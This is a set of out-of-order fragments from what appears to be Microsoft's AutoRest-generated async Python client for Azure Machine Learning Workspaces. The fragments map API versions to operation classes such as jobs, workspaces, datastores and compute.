'code_versions'\".format(api_version))", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass else: raise ValueError(\"API version", "..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentVersionsOperations", "operation group 'migration'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_containers(self): \"\"\"Instance depends", "'assets': '1.0.0', 'async_operations': 'v1.0', 'batch_job_deployment': '2020-09-01-dataplanepreview', 'batch_job_endpoint': '2020-09-01-dataplanepreview', 'data_call': '1.5.0', 'data_container': '1.5.0', 'data_version':", "v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs') if api_version == 'v1.0': from ..runhistory.aio.operations import", "on Azure Machine Learning Workspace resources. 
This ready contains multiple API versions, to", "\"\"\"Instance depends on the API version: * 1.0.0: :class:`ExtensiveModelOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ExtensiveModelOperations>` \"\"\" api_version = self._get_api_version('extensive_model')", "\"\"\" api_version = self._get_api_version('experiments') if api_version == 'v1.0': from ..runhistory.aio.operations import ExperimentsOperations as", "from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance depends on the API version: * 1.5.0:", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_versions(self): \"\"\"Instance depends on the API version:", "online_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.OnlineDeploymentsOperations>` * 2022-02-01-preview: :class:`OnlineDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.OnlineDeploymentsOperations>`", "* 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` * 2022-05-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspaceFeaturesOperations>` \"\"\" api_version = self._get_api_version('workspace_features') if api_version ==", "subscription_id: str :param api_version: API version to use if no profile is provided,", "def dataset_controller_v2(self): \"\"\"Instance depends on the API version: * 1.5.0: 
:class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version", ":class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0': from ..registry_discovery.aio.operations import RegistryManagementNonWorkspaceOperations", "import OnlineEndpointsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "'2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass else: raise ValueError(\"API version {} does", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from", "'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration': '1.0.0',", "= self._get_api_version('extensive_model') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass else:", "api_version): return {k: v for k, v in cls.models(api_version).__dict__.items() if isinstance(v, type)} @classmethod", "MultiApiClientMixin.\" Will be removed in final version of multiapi azure-core based client \"\"\"", "= self._get_api_version('compute') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass elif", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'private_endpoint_connections'\".format(api_version)) return", ":class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version = 
self._get_api_version('virtual_machine_sizes') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations", "'data_version': '1.5.0', 'dataset_containers': '2021-10-01', 'dataset_controller_v2': '1.5.0', 'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete':", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchDeploymentsOperations as OperationClass elif api_version ==", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have", "have operation group 'usages'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def virtual_machine_sizes(self): \"\"\"Instance", "to operate on Azure Machine Learning Workspace resources. 
This ready contains multiple API", "does not have operation group 'workspaces'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) async def", "'delete': 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration':", "operation group 'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def async_operations(self): \"\"\"Instance depends", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'code_containers'\".format(api_version)) return", "from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass else: raise ValueError(\"API version {} does not", "operation group 'workspace_features'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspaces(self): \"\"\"Instance depends", "* v1.0: :class:`RunsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunsOperations>` \"\"\" api_version = self._get_api_version('runs') if api_version == 'v1.0': from ..runhistory.aio.operations", "'1.5.0', 'delete': 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model': '1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0',", "== '2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-01-01-preview': from", "have operation group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance", "from 
azure.profiles import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin from msrest import Deserializer,", "return models raise ValueError(\"API version {} is not available\".format(api_version)) @property def assets(self): \"\"\"Instance", "from msrest import Deserializer, Serializer from ._configuration import AzureMachineLearningWorkspacesConfiguration if TYPE_CHECKING: # pylint:", "ComponentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass", "'v1.0': from ..runhistory.aio.operations import MetricOperations as OperationClass else: raise ValueError(\"API version {} does", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def component_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "* 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` * 2022-05-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions') if api_version ==", "def jobs(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview:", "== '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import OnlineDeploymentsOperations as OperationClass elif api_version == '2022-05-01': from", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import VirtualMachineSizesOperations as OperationClass elif api_version == '2022-01-01-preview':", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def 
virtual_machine_sizes(self): \"\"\"Instance depends on the API", "* 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>` \"\"\" api_version = self._get_api_version('operations') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations", "not have operation group 'data_call'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_container(self):", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations as OperationClass else: raise ValueError(\"API version", "version: * 2021-10-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.VirtualMachineSizesOperations>` * 2022-01-01-preview: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.VirtualMachineSizesOperations>` * 2022-05-01: :class:`VirtualMachineSizesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.VirtualMachineSizesOperations>` \"\"\" api_version =", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "from ..v2021_10_01.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance depends on the API version:", "* 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: 
:class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments')", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import DataVersionsOperations as OperationClass else: raise", "credential: Credential needed for the client to connect to Azure. :type credential: ~azure.core.credentials_async.AsyncTokenCredential", "2021-10-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentContainersOperations>` * 2022-05-01: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentContainersOperations>` \"\"\" api_version", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelContainersOperations as OperationClass else: raise ValueError(\"API version", "\"\"\"Instance depends on the API version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references')", "azure.profiles.KnownProfiles :keyword int polling_interval: Default waiting time between two polls for LRO operations", "version {} does not have operation group 'batch_job_endpoint'\".format(api_version)) return OperationClass(self._client, self._config, 
Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions') if api_version == '2021-10-01':", "_PROFILE_TAG + \" latest\" ) def __init__( self, credential: \"AsyncTokenCredential\", subscription_id: str, api_version:", "Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def usages(self): \"\"\"Instance depends on the API version: * 2021-10-01:", "WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass", "dataset_controller_v2(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version =", "from ..v2021_10_01.aio.operations import DatasetContainersOperations as OperationClass else: raise ValueError(\"API version {} does not", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceFeaturesOperations>` * 2022-01-01-preview: :class:`WorkspaceFeaturesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceFeaturesOperations>` *", "* 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version = self._get_api_version('quotas') if api_version ==", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 
'dataset_controller_v2'\".format(api_version))", "def models(cls, api_version=DEFAULT_API_VERSION): \"\"\"Module depends on the API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` *", ":class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version =", "2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments') if api_version == '2021-10-01':", "api_version = self._get_api_version('datastores') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatastoresOperations as OperationClass", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance depends on the API version: *", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataVersionsOperations as OperationClass elif api_version == '2022-05-01':", "..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations", 
"\"\"\"Instance depends on the API version: * v1.0: :class:`ExperimentsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.ExperimentsOperations>` \"\"\" api_version = self._get_api_version('experiments')", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'dataset_versions'\".format(api_version)) return", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'workspace_connections'\".format(api_version))", "'2022-05-01': from ..v2022_05_01.aio.operations import WorkspacesOperations as OperationClass else: raise ValueError(\"API version {} does", "AsyncARMPipelineClient from azure.profiles import KnownProfiles, ProfileDefinition from azure.profiles.multiapiclient import MultiApiClientMixin from msrest import", "as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceFeaturesOperations as OperationClass elif", "from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass else: raise ValueError(\"API version {} does not", "self._get_api_version('spans') if api_version == 'v1.0': from ..runhistory.aio.operations import SpansOperations as OperationClass else: raise", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-02-01-preview':", "profile. 
The profile sets a mapping between an operation group and its API", "\"\"\" api_version = self._get_api_version('usages') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import UsagesOperations as", "AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow end users to operate on Azure Machine Learning", "deal with all of the Azure clouds (Azure Stack, Azure Government, Azure China,", "2021-10-01-dataplanepreview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeContainersOperations>` * 2022-02-01-preview: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeContainersOperations>` * 2022-05-01: :class:`CodeContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeContainersOperations>` \"\"\" api_version = self._get_api_version('code_containers') if", "if api_version == '1.5.0': from ..dataset_dataplane import models return models elif api_version ==", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance depends on the API", "return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def models(self): \"\"\"Instance depends on the API", "of multiapi azure-core based client \"\"\" pass class AzureMachineLearningWorkspaces(MultiApiClientMixin, _SDKClient): \"\"\"These APIs allow", "the API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: 
:class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\"", "'metric': 'v1.0', 'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs':", "* 2020-09-01-dataplanepreview: :class:`BatchJobDeploymentOperations<azure.mgmt.machinelearningservices.v2020_09_01_dataplanepreview.aio.operations.BatchJobDeploymentOperations>` \"\"\" api_version = self._get_api_version('batch_job_deployment') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations", "WorkspaceFeaturesOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import WorkspaceFeaturesOperations as OperationClass", "raise ValueError(\"API version {} does not have operation group 'metric'\".format(api_version)) return OperationClass(self._client, self._config,", "..v2022_05_01.aio.operations import DatastoresOperations as OperationClass else: raise ValueError(\"API version {} does not have", "API version: * v1.0: :class:`RegistryManagementNonWorkspaceOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.RegistryManagementNonWorkspaceOperations>` \"\"\" api_version = self._get_api_version('registry_management_non_workspace') if api_version == 'v1.0':", "have operation group 'datasets_v1'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datastores(self): \"\"\"Instance", "def quotas(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview:", "Corporation. All rights reserved. # Licensed under the MIT License. 
See License.txt in", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'data_container'\".format(api_version))", "if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import GetOperationStatusOperations as OperationClass else: raise ValueError(\"API", "API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version", ":class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` * 2022-05-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComputeOperations>` \"\"\" api_version = self._get_api_version('compute') if api_version == '2021-10-01': from", "2021-10-01-dataplanepreview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelContainersOperations>` * 2022-02-01-preview: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelContainersOperations>` * 2022-05-01: :class:`ModelContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelContainersOperations>` \"\"\" api_version = self._get_api_version('model_containers') if", "2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "'1.5.0': from ..dataset_dataplane import models return models elif api_version == '1.0.0': from 
..model_dataplane", "api_version: Optional[str] = None, base_url: str = \"https://management.azure.com\", profile: KnownProfiles = KnownProfiles.default, **kwargs", "'2021-10-01': from ..v2021_10_01.aio.operations import ComputeOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations", "operation group 'batch_deployments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_endpoints(self): \"\"\"Instance depends", "have operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_endpoint(self): \"\"\"Instance", "2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "== '2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-01-01-preview': from", "2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions') if api_version == '2021-10-01':", "elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass elif api_version ==", "depends on the API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version 
= self._get_api_version('dataset_versions') if", "API version: * 2021-10-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.QuotasOperations>` * 2022-01-01-preview: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: :class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.QuotasOperations>` \"\"\" api_version", "OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version", "the code is # regenerated. # -------------------------------------------------------------------------- from typing import Any, Optional, TYPE_CHECKING", "have operation group 'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance", "not have operation group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self):", "BatchEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchEndpointsOperations as OperationClass", "on the API version: * 1.0.0: :class:`AssetsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.AssetsOperations>` \"\"\" api_version = self._get_api_version('assets') if api_version", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-05-01':", "== '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspacesOperations as OperationClass elif api_version == '2022-05-01': 
from", "API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version", "version {} is not available\".format(api_version)) @property def assets(self): \"\"\"Instance depends on the API", "* 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>` * 2022-05-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchDeploymentsOperations>` \"\"\" api_version = self._get_api_version('batch_deployments') if api_version ==", "@property def data_version(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataVersionOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataVersionOperations>` \"\"\"", "'run': 'v1.0', 'run_artifacts': 'v1.0', 'runs': 'v1.0', 'spans': 'v1.0', 'temporary_data_references': '2021-10-01-dataplanepreview', }}, _PROFILE_TAG +", "run_artifacts(self): \"\"\"Instance depends on the API version: * v1.0: :class:`RunArtifactsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.RunArtifactsOperations>` \"\"\" api_version =", "version {} does not have operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "raise ValueError(\"API version {} does not have operation group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config,", "EnvironmentVersionsOperations as OperationClass 
elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import EnvironmentVersionsOperations as OperationClass", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def events(self): \"\"\"Instance depends on the API version: *", "'2022-05-01': from ..v2022_05_01.aio.operations import Operations as OperationClass else: raise ValueError(\"API version {} does", "import models return models elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview import models return", "'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance depends on the", ":class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs') if api_version == '2021-10-01': from", "depends on the API version: * 2021-10-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.UsagesOperations>` * 2022-01-01-preview: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01:", "..v2022_05_01.aio.operations import UsagesOperations as OperationClass else: raise ValueError(\"API version {} does not have", "# Code generated by Microsoft (R) AutoRest Code Generator. 
# Changes may cause", "version: * 2021-10-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version =", "import models return models elif api_version == '2021-10-01': from ..v2021_10_01 import models return", "depends on the API version: * v1.0: :class:`AsyncOperationsOperations<azure.mgmt.machinelearningservices.registry_discovery.aio.operations.AsyncOperationsOperations>` \"\"\" api_version = self._get_api_version('async_operations') if", "ComponentVersionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ComponentVersionsOperations as OperationClass", "the project root for # license information. 
# # Code generated by Microsoft", "* 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.WorkspacesOperations>` \"\"\" api_version = self._get_api_version('workspaces')", "have operation group 'datastores'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def delete(self): \"\"\"Instance", "= AsyncARMPipelineClient(base_url=base_url, config=self._config, **kwargs) super(AzureMachineLearningWorkspaces, self).__init__( api_version=api_version, profile=profile ) @classmethod def _models_dict(cls, api_version):", "models return models elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview import models return models", "'2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateEndpointConnectionsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", ":class:`QuotasOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.QuotasOperations>` * 2022-05-01: 